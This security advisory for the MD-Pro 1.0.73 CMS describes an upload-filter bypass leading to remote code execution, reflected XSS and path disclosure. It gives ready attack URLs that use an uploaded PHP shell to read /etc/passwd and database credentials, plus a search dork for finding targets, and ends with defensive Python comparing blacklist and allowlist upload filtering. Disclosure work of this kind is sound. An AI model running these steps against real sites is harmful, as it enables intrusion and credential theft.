MAXdev MD-Pro 1.0.73 (possibly prior versions) remote code execution / cross site scripting / path disclosure

software:
site: http://www.maxdev.com/
description: http://www.maxdev.com/AboutMD.phtml

1) remote code/commands execution:

After registration go to the "Downloads" page and click on "Add a download". The upload form tells you:

"You are not authorized to use any of the following filetypes for uploading: .swf .jsp .php .php3 .php4 .phtml .pl .com .bat .exe"

Geez, and what about .inc, .pwml, .php2 or anything else the server hands to an interpreter (use your imagination)? ;) Which file types get executed depends on the server configuration, not on the application, so the check should instead define which types a user CAN upload (an allowlist), not which ones he cannot. :)

Upload a file with the .inc extension containing PHP that runs the "c" request parameter as a shell command, then:

list directories with:
http://[target]/[path]/upload/dl/[filename].inc?c=ls%20-la

read the /etc/passwd file:
http://[target]/[path]/upload/dl/[filename].inc?c=cat%20/etc/passwd

read the database username and password:
http://[target]/[path]/upload/dl/[filename].inc?c=cat%20../../config/md-config.php

2) XSS (reflected through the print, sitename and hlpfile parameters):

http://[target]/[path]/modules.php?op=modload&name=subjects&file=print&print=
http://[target]/[path]/modules.php?op=modload&name=Messages&file=bb_smilies&sitename=
http://[target]/[path]/modules.php?op=modload&name=Messages&file=bbcode_ref&sitename=
http://[target]/[path]/javascript/openwindow.php?hlpfile=")

3) path disclosure (requesting these scripts/directories directly produces errors revealing the installation path):

http://[target]/[path]/modules/Wiki/pnblocks/wiki.php
http://[target]/[path]/modules/AutoTheme/
http://[target]/[path]/modules/Blocks/
http://[target]/[path]/modules/MySQL_Tools/admin.php
http://[target]/[path]/md/modules/Permissions/pnadmin.php
http://[target]/[path]/md/modules/Topics/

googledork: "Powered by MD-Pro" | "made with MD-Pro"

rgod
site: http://rgod.altervista.org
mail: retrogod@aliceposta.it
original advisory: http://rgod.altervista.org/maxdev1073.html
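The root cause of issue 1) is that the upload check is a blacklist of extensions. The Python below is an added example, not code from MD-Pro or from the original advisory: it models a naive blacklist filter using the exact list quoted in the upload form's error message, puts an allowlist filter beside it, and reports which of the extensions named in the advisory (.inc, .pwml, .php2) slip past the blacklist. The allowlist contents, the set of "server-executable" extensions, the double-extension handling and all function names are assumptions, not MD-Pro's code; the sample filenames are constructed.

```python
"""
Upload extension filtering: blacklist (as MD-Pro 1.0.73 does it) versus
allowlist.  Added example, not code from MD-Pro or the advisory.
"""

import posixpath

# Extensions MD-Pro 1.0.73 refuses, exactly as quoted in the advisory.
MDPRO_BLACKLIST = {".swf", ".jsp", ".php", ".php3", ".php4", ".phtml",
                   ".pl", ".com", ".bat", ".exe"}

# Assumed allowlist for a downloads module: only inert document/archive types.
DOWNLOAD_ALLOWLIST = {".zip", ".tar", ".gz", ".pdf", ".txt",
                      ".jpg", ".png", ".gif"}

# Extensions a typical PHP/Apache setup may hand to an interpreter.
# Assumption for illustration: the real set depends entirely on the server.
SERVER_EXECUTABLE = {".php", ".php2", ".php3", ".php4", ".php5", ".phtml",
                     ".phps", ".inc", ".pwml", ".pl", ".cgi", ".jsp", ".shtml"}


def _suffixes(filename):
    """Lowercased dotted suffixes of the basename: 'a.php.jpg' -> ['.php', '.jpg']."""
    parts = posixpath.basename(filename).lower().split(".")
    return ["." + p for p in parts[1:]]


def blacklist_allows(filename):
    """Naive filter matching the advisory's error message: reject only when
    the final extension is on the blacklist.  Anything else, e.g. .inc, passes."""
    exts = _suffixes(filename)
    return not exts or exts[-1] not in MDPRO_BLACKLIST


def allowlist_allows(filename):
    """Hardened filter: plain basename only, final extension must be on the
    allowlist, and no earlier suffix may be an executable type (defends
    against multi-extension handler configs such as Apache AddHandler)."""
    base = posixpath.basename(filename)
    if base != filename or "\x00" in filename or base in ("", ".", ".."):
        return False
    exts = _suffixes(filename)
    if not exts or exts[-1] not in DOWNLOAD_ALLOWLIST:
        return False
    return not any(e in SERVER_EXECUTABLE for e in exts[:-1])


def would_execute(filename):
    """Whether a server configured per SERVER_EXECUTABLE would interpret the
    file (assumption: any suffix in the set triggers the handler)."""
    return any(e in SERVER_EXECUTABLE for e in _suffixes(filename))


def audit(names):
    """Per filename: (name, blacklist passes, allowlist passes, RCE bypass),
    where a bypass is a file the blacklist accepts and the server would run."""
    return [(n, blacklist_allows(n), allowlist_allows(n),
             blacklist_allows(n) and would_execute(n)) for n in names]


if __name__ == "__main__":
    # Constructed sample names covering the advisory's extensions and two
    # tricks the allowlist must also handle (double extension, path traversal).
    SAMPLES = ["notes.txt", "shell.php", "shell.inc", "shell.php2",
               "shell.pwml", "shell.php.jpg", "../shell.inc"]
    for name, bl, al, bypass in audit(SAMPLES):
        print(f"{name:16} blacklist={str(bl):5} allowlist={str(al):5} "
              f"rce_bypass={bypass}")
```

Run it as-is to see the blacklist pass shell.inc, shell.php2, shell.pwml and shell.php.jpg while the allowlist rejects all of them and still accepts notes.txt. The allowlist also refuses names carrying path components, which an application that builds the upload path from the user-supplied filename needs regardless of extension.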